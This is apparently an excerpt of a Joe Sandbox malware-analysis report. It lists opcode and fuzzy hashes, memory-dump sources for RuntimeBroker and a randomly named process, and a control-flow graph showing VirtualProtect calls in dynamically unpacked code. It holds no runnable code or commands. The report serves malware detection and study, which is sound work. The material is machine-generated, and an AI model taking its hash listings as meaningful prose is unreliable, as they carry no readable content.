                                                                      • Instruction ID: 012b1e8b9fceebd5ed2ad95eded0d7c9b0ee91a15502e2fb83c325f1afe833f3
                                                                      • Opcode Fuzzy Hash: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
                                                                      • Instruction Fuzzy Hash: 2BE0173154A7C84FC30AAB749CB99543FB0EEAB21178B01D7D045CB6B3EA1E8D88C752
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction ID: 50a7127e8c417f4566172e8b9dbf396791b88f84637248cb58d4e2abd7bd6aad
                                                                      • Opcode Fuzzy Hash: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction Fuzzy Hash: A6E0C23054A7C44FC30AA7648C788403FB1EE6B21178B40CBC005CF5B3EA0D8C48C742
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction ID: 43c17ab8deacb7067e5d0d38499529c0938a085f3d5cd66090e169f11640904d
                                                                      • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction Fuzzy Hash: 56D01234B559044FC71CB739885987473A1EB6E21779640A9D00ACB2B1D96AED89C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction ID: b1a987d9646deeebcc95fb385dab26c671575aa57d32c955645e03adb8f13550
                                                                      • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction Fuzzy Hash: 7DD02234B548040FC70CBB3888588303390EB6E2277C140A9D00AC72B1E92ADC88C740
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction ID: a1592d64f44aef6646087a3d6f4792349c7178ea0843b085b4c9772da485db98
                                                                      • Opcode Fuzzy Hash: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction Fuzzy Hash: 45C04C06F6B61F01FC3677EF98660ACA9405FDDE10FD70172D54D400E19D4D22D54156
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction ID: 9e367327750c0d45ccf545ba014d1e26a92ed4a7658237128fca792b0164cc12
                                                                      • Opcode Fuzzy Hash: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction Fuzzy Hash: 9FC08C305258088FC904E72DC98480076E0FB0D210BC20090E00EC7170E21A9C90C708
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 45700d14890448792f7a77ee4ad80256f46f31d6e75c6f2da8f924a925832783
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F4C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7271E669DDD6C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 930dd795de9fa96c39b3a3dc93de49f779c1b9a10b594cbe09fb33c341a96781
                                                                      • Instruction ID: e66853bd5abbd316dd62931102c6f23c031e02e0e75b1562851458f6f8d88ce2
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e397bfac7922568a954f2755b9952f11e5e865dc729b9b14b1aad0260887caf
                                                                      • Instruction ID: c57aebefc3f382fa054dde80db92e4efcadcf61281334af41bb6a4ef2fa567b5
                                                                      • Opcode Fuzzy Hash: 2e397bfac7922568a954f2755b9952f11e5e865dc729b9b14b1aad0260887caf
                                                                      • Instruction Fuzzy Hash: 1C312572A0D91D4FEB64FF98D8A46B97391EBA8320F04037BD40DC72D5CD2469418780
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62dc6f3fec2a8f8b1db601053cca6850a5d1a125009f82ffdada9076223bdb0d
                                                                      • Instruction ID: 49e812ea1cf60cd2d8a5e2a87b641f377598fab47b95bd2199a8bf15d9d74c7b
                                                                      • Opcode Fuzzy Hash: 62dc6f3fec2a8f8b1db601053cca6850a5d1a125009f82ffdada9076223bdb0d
                                                                      • Instruction Fuzzy Hash: 5A31A231A0D64E9FDF45EBA8C8689B97BF1FF69300B0505BAC009D72A2DE28A941C740
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction ID: 26b371ae5d22925d681d1fefb9f09113c9bfb7e649d808597faecbeb96354945
                                                                      • Opcode Fuzzy Hash: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction Fuzzy Hash: 25213736B1E25D8FEB26A7A8AC250DC7F60EF45328F0541F3D058CB1D3D92826469781
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa30fb7a45d2745f9d71bfc90eb99541d9e54c6a6138c6727b9b8d51128631b7
                                                                      • Instruction ID: 33515117100cdeccbce0b733b35a0a716c785f03c9a7c7ae55017aaa7df89d96
                                                                      • Opcode Fuzzy Hash: aa30fb7a45d2745f9d71bfc90eb99541d9e54c6a6138c6727b9b8d51128631b7
                                                                      • Instruction Fuzzy Hash: 70219272F0551D8BEB64FA98D8547FE73A2EBD8311F018177D009D3298DE396A4687D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction ID: fec1a2d292ebe15e690a27d3c8d3668cf4e45f7402c3822f2dd18102452d4b2a
                                                                      • Opcode Fuzzy Hash: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction Fuzzy Hash: A7214721F1E90E9BEFB4F76884646B866D2EF8C711F5601B5D01ED72F2ED28AE418740
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 460e71bf9650a6608303dcee80272e9f57f96532747a1188183e1e9b29ae8fbd
                                                                      • Instruction ID: ed9b5a1feb58981887635b8200ebd2b543d81aa22bf60d9e7a8759de81023536
                                                                      • Opcode Fuzzy Hash: 460e71bf9650a6608303dcee80272e9f57f96532747a1188183e1e9b29ae8fbd
                                                                      • Instruction Fuzzy Hash: C321C931A0E6DD4FEB168F68C8701A57FA1AF4B310B0A41FBD049C71A3DA28590683A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df1965d16ef1bd89ccd89fa870d474802ad0be9b1d72ced381d890bb2f5c77d6
                                                                      • Instruction ID: 33794eebe3b9cbd9dd6b47171d4c84fb3774b861b9a3eaeeaae3bffdb75c082d
                                                                      • Opcode Fuzzy Hash: df1965d16ef1bd89ccd89fa870d474802ad0be9b1d72ced381d890bb2f5c77d6
                                                                      • Instruction Fuzzy Hash: 59216AB4A18AAD8EE349EF58C4A97A53FE4E795319F00007FC04ED2AD5CBB90065C744
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction ID: f38a2b5c159d21b014f59bb00da816dd5ab370d8c3d035f9dbb82760c4bff89d
                                                                      • Opcode Fuzzy Hash: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction Fuzzy Hash: DF11E132E1E38D8FEB12DBA8886019C7FB0EF56714F0641F7D054DB2A2D93866458780
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction ID: d1d94c76d1346f6878fd9981222ae4c27dafc7d87efef206e9d1eafee5ef111e
                                                                      • Opcode Fuzzy Hash: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction Fuzzy Hash: 7701C031E1E38D8FEB12DBA8886009C7FB0EF06704F0641F7D054DB2A2D93866458780
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction ID: 32864386d666a27ddef3aa2b539f6f99fe1b8e43b80e78dd5bcfff2e813d6909
                                                                      • Opcode Fuzzy Hash: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction Fuzzy Hash: B9019E31E1E38D8EEB22DBA8886409C7FB0AF1A704F1541F7D054CB2A2D93866448740
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: 81e4882dc4778f48362ee329f6f9474d6999b61f6d868f8e80d67a8a0dd082ef
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: 9BF03134F5E41F9AEFB4A754C8647B87762FF98711F5542B9C00DA31A1DE386A818B40
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction ID: a4f239b09f9e580014013dd1df75325c70794e5468312655f167317a617412ae
                                                                      • Opcode Fuzzy Hash: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction Fuzzy Hash: 29F0E53571EA59CFC741AB38DC999D47F60EB47215BAA14FAC08AC7962C220586ECB44
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction ID: 0f0f96835cc818666733789956ea4040c73a393f41e74abf953420c42cc7dab1
                                                                      • Opcode Fuzzy Hash: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction Fuzzy Hash: B7E02B217197C80FC719567948650607BF1DF9B21138A41EBD096C72E3DD18DC458345
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: eb05ac72acd36fa1e355f1a98ee1d01b38a027b0277aca0ca464e1afbb3de9f5
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: 67F03A21F1E40E9AEFB0E798C8642B83753AF88B11F5642B5C00DA32F1DD28AA428640
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction ID: 1c202315581f056a0c595c2d119a1491104f722a4f260ff0dc900fc09a3281e5
                                                                      • Opcode Fuzzy Hash: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction Fuzzy Hash: D7E06D66B0A6844FD71A6A384C758B43B918F6A22A75A04A7D046CF6F3D8159D498311
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9f58ba7b8cb941651a7c4706ddb61e88a0e925ca703faed3b9a13acc19c8492
                                                                      • Instruction ID: 4a168a73183eefba2ce91238d3b479be9b77ce36ef23bc47fc1f3a475197b0c1
                                                                      • Opcode Fuzzy Hash: b9f58ba7b8cb941651a7c4706ddb61e88a0e925ca703faed3b9a13acc19c8492
                                                                      • Instruction Fuzzy Hash: 49F08235F0451E8BEB18DF84CC659BD73B5FB54340F510679D426DB2E8DE746A018780
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction ID: d76dacb5a0c33f858fc90aff7325f76d3a893c3448b8a1d9d1efb4bb65bbfee3
                                                                      • Opcode Fuzzy Hash: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction Fuzzy Hash: DBE01220709B884FC70DA66948695647BB1EFAA21278A52DBC045CB6A3EE19DC85C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction ID: be2653dae989573074bf913477c8499db98a35f19379fc432810422f359cbcf1
                                                                      • Opcode Fuzzy Hash: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction Fuzzy Hash: 72E08C2160AB844FC70EA7288CA99503BB1EFAB21278A40DBC005CB6B3EA1DCC49C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99395f661c71e463dcb607e9c3438f8178b598197d95f4a9f776743875848bc0
                                                                      • Instruction ID: a7451842b8d681d18f10bf320b8e3e65516a6f2e381d92470d6bd1a962184d98
                                                                      • Opcode Fuzzy Hash: 99395f661c71e463dcb607e9c3438f8178b598197d95f4a9f776743875848bc0
                                                                      • Instruction Fuzzy Hash: 83E0DF52F1A80E8AEBE8AB5804A83BC4AC0DF2C210F0600F6A40CC32E2EC2819C20781
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

                                                                      Execution Graph

                                                                      Execution Coverage:8.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:10
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 1667 7ffd9b88087a 1669 7ffd9b88b150 1667->1669 1668 7ffd9b88b2ca 1669->1668 1670 7ffd9b88b3f5 VirtualProtect 1669->1670 1671 7ffd9b88b42e 1670->1671 1672 7ffd9b880848 1674 7ffd9b88084d 1672->1674 1673 7ffd9b88b098 1674->1673 1675 7ffd9b88b3f5 VirtualProtect 1674->1675 1676 7ffd9b88b42e 1675->1676

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ffd9b880848-7ffd9b88af3d 5 7ffd9b88afae-7ffd9b88afb5 0->5 6 7ffd9b88af3f-7ffd9b88af8c 0->6 7 7ffd9b88afb7-7ffd9b88afba 5->7 8 7ffd9b88afff-7ffd9b88b062 5->8 6->8 17 7ffd9b88af8e-7ffd9b88afa7 6->17 9 7ffd9b88afbc-7ffd9b88afcf 7->9 10 7ffd9b88aff4-7ffd9b88affc 7->10 19 7ffd9b88b06a-7ffd9b88b096 call 7ffd9b88b0ba 8->19 20 7ffd9b88b064 8->20 12 7ffd9b88afd1 9->12 13 7ffd9b88afd3-7ffd9b88afe6 9->13 10->8 12->13 13->13 16 7ffd9b88afe8-7ffd9b88aff0 13->16 16->10 17->5 24 7ffd9b88b107-7ffd9b88b117 19->24 25 7ffd9b88b098-7ffd9b88b09e 19->25 20->19 28 7ffd9b88b119-7ffd9b88b121 24->28 29 7ffd9b88b122-7ffd9b88b133 24->29 26 7ffd9b88b0a5-7ffd9b88b0b9 25->26 27 7ffd9b88b0a0 25->27 27->26 28->29 30 7ffd9b88b135-7ffd9b88b13d 29->30 31 7ffd9b88b13e-7ffd9b88b17d 29->31 30->31 33 7ffd9b88b1ee-7ffd9b88b1f1 31->33 34 7ffd9b88b17f-7ffd9b88b1d2 31->34 35 7ffd9b88b1e3 33->35 36 7ffd9b88b1f3-7ffd9b88b1fd 33->36 39 7ffd9b88b22d-7ffd9b88b294 34->39 47 7ffd9b88b1d4-7ffd9b88b1dd 34->47 38 7ffd9b88b1e5-7ffd9b88b1e8 35->38 35->39 40 7ffd9b88b1ff 36->40 41 7ffd9b88b201-7ffd9b88b214 36->41 42 7ffd9b88b1ea-7ffd9b88b1ed 38->42 43 7ffd9b88b222-7ffd9b88b22a 38->43 49 7ffd9b88b296 39->49 50 7ffd9b88b29c-7ffd9b88b2c8 call 7ffd9b88b2ec 39->50 40->41 41->41 44 7ffd9b88b216-7ffd9b88b21e 41->44 42->33 43->39 44->43 47->35 49->50 53 7ffd9b88b339-7ffd9b88b347 50->53 54 7ffd9b88b2ca-7ffd9b88b2d0 50->54 57 7ffd9b88b349-7ffd9b88b351 53->57 58 7ffd9b88b352-7ffd9b88b42c VirtualProtect 53->58 55 7ffd9b88b2d7-7ffd9b88b2eb 54->55 56 7ffd9b88b2d2 54->56 56->55 57->58 63 7ffd9b88b42e 58->63 64 7ffd9b88b434-7ffd9b88b45c 58->64 63->64
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.2322563022.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5be6b03294cc05e1d22b0ca20ed9a5732e6d000d3605d4383f3000ad6e07a05
                                                                      • Instruction ID: 499f35ee0dbba996c3c41f61c5533ea9d92fd56861c7654ed97aef6949c46bb2
                                                                      • Opcode Fuzzy Hash: d5be6b03294cc05e1d22b0ca20ed9a5732e6d000d3605d4383f3000ad6e07a05
                                                                      • Instruction Fuzzy Hash: F951B321B1D95E4FEBACFB68947667972D2EF9C300F0541BAD40EC32D7ED28A9454B80
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                      • Instruction ID: dbef140c4aa4418e9ef87a0cae5e29ebf1933d7aeeba838eab54f1376e18cb09
                                                                      • Opcode Fuzzy Hash: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                      • Instruction Fuzzy Hash: 5A31043130D9194FD768EB5CE88A9B977D1EF8A32130541BBE48ACB166D921EC828781
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
